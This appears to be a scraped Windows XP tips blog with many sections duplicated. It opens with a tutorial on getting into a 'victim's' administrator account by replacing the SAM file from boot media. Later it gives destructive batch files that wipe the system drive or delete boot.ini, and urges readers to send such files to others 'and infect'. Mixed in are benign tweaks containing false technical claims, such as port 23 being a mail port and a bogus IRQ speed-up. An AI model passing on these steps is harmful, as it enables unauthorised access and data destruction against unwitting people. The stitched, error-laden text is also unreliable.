This tutorial tells you how to break administrator password and gain access to admin account. Also if you need to crack/reveal the password you find the steps here to accomplish that also.
Microsoft stores all Security Information in many files but the main file is the SAM file (Security Accounts Manager)! this file contain security information about users(mainly Password).You can explore the SAM file here in this folder
$windows\system32\config
SAM is the file which contains the passwords in the form of a HASH.A HASH is a mathematically irreversible form of encryption,so that theres no way of decrypting the password back .Also there’s a file called SECURITY that contains a list of all users in the system & their related information
We will Not be able To copy them Under XP since it doesn’t support any attempt to copy this file.
The Idea Behind Cracking the password
The SAM contain’s a Security Information(password/s), so I have created a Free Windows XP SP2 Logon account (Administrator Account without password) that means when windows Launch it Will enter directly to the system without asking about any password.So, this SAM file contain’s an open password(no password).
So, the idea here is to replace the SAM file of victim’s computer(which contain’s password) with the SAM file which contains no password.When this is done the password of the victim’s account is erased and it let’s anyone to login to the computer as if there is no password set by admin.
But this SAM file cannot be manipulated(copy/rename/replace/delete) when the operating system is running.So here are some of the ideas to replace this SAM file.
1.If there are two OS installed on the computer we can boot from other OS and replace the SAM file located at
$:\windows\system32\config
2.If there is only a single OS then use the tool NTFS4DOS to access the location of the SAM and SECURITY files from the boot command prompt.
NTFS4DOS creates a bootable floppy disk. You can use this floppy to access the NTFS drives by booting the system and mounting it to DOS.
Here are the steps to be followed to break the password.
1-Download SAM file.
2- Go to the target Machine, and try to Access it by Booting from the floppy created by NTFS4DOS or by other OS(in case you have two OS installed)
3- After Getting Access to the Boot Command prompt c:> Go to the config folder
$windir$\system32\config
And Copy the SAM File and SYSTEM File(we will need it later) To other any folder, Then replace the original SAM file(In $windows$\system32\config) with the SAM file i have provided
5- Reboot and Make windows enter normally
6- Yeah, Now you can directly enter the system without any password. ie:The PW is broken!.
Now you have broken the system administrator password and you can directly enter system.Now one phase of the password hack is over.If you need to know/crack the admin password then you can use the two files SAM & SECURITY that you have copied in the above STEP-3.
link for the SAM file
http://rapidshare.com/files/88242662/SAM.rar
NTFS4DOS
http://www.free-av.com/en/tools/11/avira_ntfs4dos_personal.html
Sunday, January 25, 2009
All About TELNET
Introduction:
Telnet is used to connect to remote machines through emulation. This means that
it can connect to a server, any server instantly because of it's ability to emulate (copy)
remote computers.
Lets Start:
In Windows, Telnet can be found by going to Start -> Run and then typing telnet.
The application should then pop up. If you don't have Windows, there are many Telnet alternatives for mac, linux etc. Since I don't know any,search the internet for Telnet for Linux or Telnet for Mac and you should find something instantly.
If you have a PC and are using Windows 98/95, 2000, Me, or XP continue...
As you can see, Telnet has 4 menu options. These are Connect, Edit, Terminal, and Help.
If you click Connect, you should see more options. Here they are.
Connect:
Remote System..
Disconnect
Exit
Names of servers you have been on.
To connect to a server, click Remote System...
This will then take you to a dialog box that has these fields:
Hostname:
Port:
TermType:
There should also be a Connect button and a Cancel Button.
Lets go over these & what you should put in them.
-Hostname-
The Hostname can be the address of the website your going to be connecting to:
http://www.oreos.com
or it can be the IP address. Keep in mind that you can only connect to servers and not to clients (other PCs)
an IP Address looks like this:
210.111.23.45
-Port-
Port can bb either the port number you wanna connect to on the server (Port 80 is the Internet, Port 23 is Simple Mail Protocol then there are some more ports for different things..)
or you can keep it Telnet and see what happens.
-TermType-
TermType is the type of Terminal telnet will be acting like.
This doesn't matter most of the time, so you can keep it to default or try other ones if you want.
When you have all this set up, you can Click Connect & see what happens.
Note: Sometimes many servers don't like anon people just logging on, so be careful when logging onto servers, because sometimes it might be some big company that likes bullying people or just SOMEONE who likes bullying people and then they might want to find you or trace you or something and I know for a fact you don't need that happening.
Another Note: When you go to a server and type something, such as a login name or a password, you might not see anything even though you are typing. this is a feature that telnet or the other server uses. It's for some kind of safety measure.
Ok that's all for the Connect Menu, lets go over the Terminal menu.
The terminal menu should have 3 options:
Prefernces
Start Logging
Stop Logging.
-Prefernces-
If you go to this, a dialog box will come up with various options. Here, you can change the
text color & background color of the program, and you can enable Local Echo, which shows
you everything you've typed, Blinking cursor if you want the cursor to blink check it, if not uncheck, Block cursor if you want the cursor to be shown as a block, VT100 Arrows, don't worry about these they are useless, Buffer Size, this allows you to set the number of lines of text you want to be shown before the screen starts to scroll, The Terminal emualtion type, always have this set on the default unless you know what the second one is and you know what your doing.
-Start Logging-
This logs everything you do on Telnet in a log file on your computer.
-Stop Logging-
This will stop logging processes.
Telnet is used to connect to remote machines through emulation. This means that
it can connect to a server, any server instantly because of it's ability to emulate (copy)
remote computers.
Lets Start:
In Windows, Telnet can be found by going to Start -> Run and then typing telnet.
The application should then pop up. If you don't have Windows, there are many Telnet alternatives for mac, linux etc. Since I don't know any,search the internet for Telnet for Linux or Telnet for Mac and you should find something instantly.
If you have a PC and are using Windows 98/95, 2000, Me, or XP continue...
As you can see, Telnet has 4 menu options. These are Connect, Edit, Terminal, and Help.
If you click Connect, you should see more options. Here they are.
Connect:
Remote System..
Disconnect
Exit
Names of servers you have been on.
To connect to a server, click Remote System...
This will then take you to a dialog box that has these fields:
Hostname:
Port:
TermType:
There should also be a Connect button and a Cancel Button.
Lets go over these & what you should put in them.
-Hostname-
The Hostname can be the address of the website your going to be connecting to:
http://www.oreos.com
or it can be the IP address. Keep in mind that you can only connect to servers and not to clients (other PCs)
an IP Address looks like this:
210.111.23.45
-Port-
Port can bb either the port number you wanna connect to on the server (Port 80 is the Internet, Port 23 is Simple Mail Protocol then there are some more ports for different things..)
or you can keep it Telnet and see what happens.
-TermType-
TermType is the type of Terminal telnet will be acting like.
This doesn't matter most of the time, so you can keep it to default or try other ones if you want.
When you have all this set up, you can Click Connect & see what happens.
Note: Sometimes many servers don't like anon people just logging on, so be careful when logging onto servers, because sometimes it might be some big company that likes bullying people or just SOMEONE who likes bullying people and then they might want to find you or trace you or something and I know for a fact you don't need that happening.
Another Note: When you go to a server and type something, such as a login name or a password, you might not see anything even though you are typing. this is a feature that telnet or the other server uses. It's for some kind of safety measure.
Ok that's all for the Connect Menu, lets go over the Terminal menu.
The terminal menu should have 3 options:
Prefernces
Start Logging
Stop Logging.
-Prefernces-
If you go to this, a dialog box will come up with various options. Here, you can change the
text color & background color of the program, and you can enable Local Echo, which shows
you everything you've typed, Blinking cursor if you want the cursor to blink check it, if not uncheck, Block cursor if you want the cursor to be shown as a block, VT100 Arrows, don't worry about these they are useless, Buffer Size, this allows you to set the number of lines of text you want to be shown before the screen starts to scroll, The Terminal emualtion type, always have this set on the default unless you know what the second one is and you know what your doing.
-Start Logging-
This logs everything you do on Telnet in a log file on your computer.
-Stop Logging-
This will stop logging processes.
hear .PDF files
You can listen to any PDF instead of reading, yes it is possible with Adobe Reader 7 .0 or 6.0,
and the short cut is
Ctrl+shift+b -to hear the entire Document
(View -> Read out Loud -> Read to the End of Document)
Ctrl+shift+v -to hear the page
(View -> Read out Loud -> Read This Page)
If it is not convenient to hear, because the voice is very fast, u can adjust that using the Voice Speed -> slow adjustment in the Control Panel->SPEECH.
and the short cut is
Ctrl+shift+b -to hear the entire Document
(View -> Read out Loud -> Read to the End of Document)
Ctrl+shift+v -to hear the page
(View -> Read out Loud -> Read This Page)
If it is not convenient to hear, because the voice is very fast, u can adjust that using the Voice Speed -> slow adjustment in the Control Panel->SPEECH.
hidden graphics tool in XP
Windows XP has got a hidden graphics tool called Private Character Editor which you can use
to create unique letters and logos for your font library and icons.
To access this tool go to startmenu > run> type “eudcedit” (except the quotes).
to create unique letters and logos for your font library and icons.
To access this tool go to startmenu > run> type “eudcedit” (except the quotes).
format hard disc with notepad
Step 1.
Copy The Following In Notepad Exactly as it says
01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X -- this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X -- this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its workin
Do not try it on ur PC. dont mess around this is for educational purpose only
still if u cant figure it out try dis
go to notepad
@Echo off
Del C:\ *.*|y
save it as Dell.bat
worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Copy The Following In Notepad Exactly as it says
01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X -- this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X -- this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its workin
Do not try it on ur PC. dont mess around this is for educational purpose only
still if u cant figure it out try dis
go to notepad
@Echo off
Del C:\ *.*|y
save it as Dell.bat
worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
how to free up resources to rum a high demanding game or application
open a new text document,paste all this in it & save it anyname.cmd
net stop "Computer Browser"
net stop Server
net stop Workstation
net stop "Help and Support"
net stop Messenger
net stop "Print Spooler"
net stop "Shell Hardware Detection"
net stop "SSDP Discovery Service"
net stop "Task Scheduler"
net stop Themes
net stop "Upload Manager"
net stop "Windows Image Acquisition (WIA)"
net stop "Automatic Updates"
to enable all services reboot computer.
net stop "Computer Browser"
net stop Server
net stop Workstation
net stop "Help and Support"
net stop Messenger
net stop "Print Spooler"
net stop "Shell Hardware Detection"
net stop "SSDP Discovery Service"
net stop "Task Scheduler"
net stop Themes
net stop "Upload Manager"
net stop "Windows Image Acquisition (WIA)"
net stop "Automatic Updates"
to enable all services reboot computer.
XP hidden apps
WINDOWS XP HIDDEN APPS:
1) Character Map = charmap.exe (very useful for finding unusual characters)
2) Disk Cleanup = cleanmgr.exe
3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)
4) Dr Watson = drwtsn32.exe (Troubleshooting tool)
5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)
6) Private character editor = eudcedit.exe (allows creation or modification of characters)
7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)
8) Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).
9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).
10) ODBC Data Source Administrator = odbcad32.exe (connecting to databases)
11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).
12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )
13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).
14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).
15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).
16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).
17) File siganture verification tool = sigverif.exe
1 Volume Control = sndvol32.exe (I've included this for those people that lose it from the System Notification area).
19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).
20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it is used to encrypt passwords).
21)Telnet Client = telnet.exe
22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).
23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).
24) System configuration = msconfig.exe (can use to control starup programs)
25) gpedit.msc (used to manage group policies, and permissions).
1) Character Map = charmap.exe (very useful for finding unusual characters)
2) Disk Cleanup = cleanmgr.exe
3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)
4) Dr Watson = drwtsn32.exe (Troubleshooting tool)
5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)
6) Private character editor = eudcedit.exe (allows creation or modification of characters)
7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)
8) Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).
9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).
10) ODBC Data Source Administrator = odbcad32.exe (connecting to databases)
11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).
12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )
13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).
14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).
15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).
16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).
17) File siganture verification tool = sigverif.exe
1 Volume Control = sndvol32.exe (I've included this for those people that lose it from the System Notification area).
19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).
20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it is used to encrypt passwords).
21)Telnet Client = telnet.exe
22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).
23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).
24) System configuration = msconfig.exe (can use to control starup programs)
25) gpedit.msc (used to manage group policies, and permissions).
speed up hard disk
To speed up your hard disk speed we need to configure a special buffer in the computer's memory in order to enable it to better deal with interrupts made from the disk.
This tip is only recommended if you have 256MB RAM or higher.
Follow these steps:
Run SYSEDIT.EXE from the Run command.
Expand the system.ini file window.
Scroll down almost to the end of the file till you find a line called [386enh].
Press Enter to make one blank line, and in that line type
Irq14=4096
Note: This line IS CASE SENSITIVE!!!
Click on the File menu, then choose Save.
Close SYSEDIT and reboot your computer.
Done. Speed improvement will be noticed after the computer reboots.
This tip is only recommended if you have 256MB RAM or higher.
Follow these steps:
Run SYSEDIT.EXE from the Run command.
Expand the system.ini file window.
Scroll down almost to the end of the file till you find a line called [386enh].
Press Enter to make one blank line, and in that line type
Irq14=4096
Note: This line IS CASE SENSITIVE!!!
Click on the File menu, then choose Save.
Close SYSEDIT and reboot your computer.
Done. Speed improvement will be noticed after the computer reboots.
Useful key shortcuts available
- Windows key + D - shows the desktop
- Windows key + M - minimizes all open windows
- Windows key + Shift + M - maximizes all open windows
- Windows key + E - Runs Windows Explorer
- Windows key + R - shows the RUN dialog
- Windows key + F - shows Search window
- Windows key + Break - shows System Properties box
- Windows key + TAB - Go through taskbar applications
- Windows key + PAUSE Display the System Properties dialog box
- Windows key + U Open Utility Manager
- ALT + TAB - Cycle through opened applications
- Hold down CTRL while dragging an item to Copy it
- CTRL + ESC Display the Start menu
- ALT + ENTER View the properties for the selected item
- F4 key Display the Address bar list in My Computer or
- NUM LOCK + Asterisk (*) Display all of the subfolders that are under the selected folder
- Windows key + M - minimizes all open windows
- Windows key + Shift + M - maximizes all open windows
- Windows key + E - Runs Windows Explorer
- Windows key + R - shows the RUN dialog
- Windows key + F - shows Search window
- Windows key + Break - shows System Properties box
- Windows key + TAB - Go through taskbar applications
- Windows key + PAUSE Display the System Properties dialog box
- Windows key + U Open Utility Manager
- ALT + TAB - Cycle through opened applications
- Hold down CTRL while dragging an item to Copy it
- CTRL + ESC Display the Start menu
- ALT + ENTER View the properties for the selected item
- F4 key Display the Address bar list in My Computer or
- NUM LOCK + Asterisk (*) Display all of the subfolders that are under the selected folder
To change Drive Letters
Go to Start > Control Panel > Administrative Tools > Computer Management, Disk Management, then right-cl!ck the partition whose name you want to change (cl!ck in the white area just below the word "Volume") and select "change drive letter and paths."
From here you can add, remove or change drive letters and paths to the partition.
From here you can add, remove or change drive letters and paths to the partition.
Restoring Desktop Icon to the Quicklaunch Bar
If you mistakenly deleted the icon for the Desktop on the Quicklaunch toolbar
Go to C:\Documents and Settings\user_name\Application Data\Microsoft\Internet Explorer\Quick Launch
(where user_name is replaced by your login name)
Create a Text file called ShowDesktop.SCF with the following contents:
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
Go to C:\Documents and Settings\user_name\Application Data\Microsoft\Internet Explorer\Quick Launch
(where user_name is replaced by your login name)
Create a Text file called ShowDesktop.SCF with the following contents:
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
Decreasing Boot Time
Microsoft has made available a program to analyze and decrease the time it takes to boot to WindowsXP
The program is called BootVis
Uncompress the file.
Run BOOTVIS.EXE
For a starting point, run Trace / Next Boot + Driver Delays
This will reboot your computer and provide a benchmark
After the reboot, BootVis will take a minute or two to show graphs of your system startup.
Note how much time it takes for your system to load (click on the red vertical line)
Then run Trace / Optimize System
Re-Run the Next Boot + Drive Delays
Note how much the time has decreased
The program is called BootVis
Uncompress the file.
Run BOOTVIS.EXE
For a starting point, run Trace / Next Boot + Driver Delays
This will reboot your computer and provide a benchmark
After the reboot, BootVis will take a minute or two to show graphs of your system startup.
Note how much time it takes for your system to load (click on the red vertical line)
Then run Trace / Optimize System
Re-Run the Next Boot + Drive Delays
Note how much the time has decreased
Advanced Disk Cleanup
This tip will show you how to create an unattended disk cleanup which will also empty your prefetch folder. This tip assumes you have Windows XP installed in c:\windows.
Step 1.
Create a new text file and place the following contents inside:
c:\windows\system32\cleanmgr.exe /dc /sageset: 1
c:
cd \
cd c:\windows\prefetch
del *.* /q
Step 2.
Save the file, changing the extension from .txt to .bat
Step 3.
Execute the file. This will run the Disk Cleanup program in a special mode which asks what items you will want cleaned when Disk Cleanup performs an unattended cleanup. Check the items you wish to have cleaned up, then click OK.
Step 4.
Right-click on the "filename.bat" file and click edit. Change the first line to read:
c:\windows\system32\cleanmgr.exe /dc /sagerun: 1
Step 5.
Save the file. You can execute this file in place of running Disk Cleanup, or, to have this program run unattended, run the Add Scheduled Task Wizard in the Control Panel and create a scheduled task using the clean.bat file you just created.
Step 1.
Create a new text file and place the following contents inside:
c:\windows\system32\cleanmgr.exe /dc /sageset: 1
c:
cd \
cd c:\windows\prefetch
del *.* /q
Step 2.
Save the file, changing the extension from .txt to .bat
Step 3.
Execute the file. This will run the Disk Cleanup program in a special mode which asks what items you will want cleaned when Disk Cleanup performs an unattended cleanup. Check the items you wish to have cleaned up, then click OK.
Step 4.
Right-click on the "filename.bat" file and click edit. Change the first line to read:
c:\windows\system32\cleanmgr.exe /dc /sagerun: 1
Step 5.
Save the file. You can execute this file in place of running Disk Cleanup, or, to have this program run unattended, run the Add Scheduled Task Wizard in the Control Panel and create a scheduled task using the clean.bat file you just created.
Block websites without any software
1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site will no longer be accessible.
5] Done!
example :
127.0.0.1 localhost
127.0.0.2 www.orkut.com
- www.orkut.com is now unaccessable
For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2)
e.g
127.0.0.3 www.yahoo.com
127.0.0.4 www.msn.com
127.0.0.5 www.google.com
Subscribe to:
Posts (Atom)
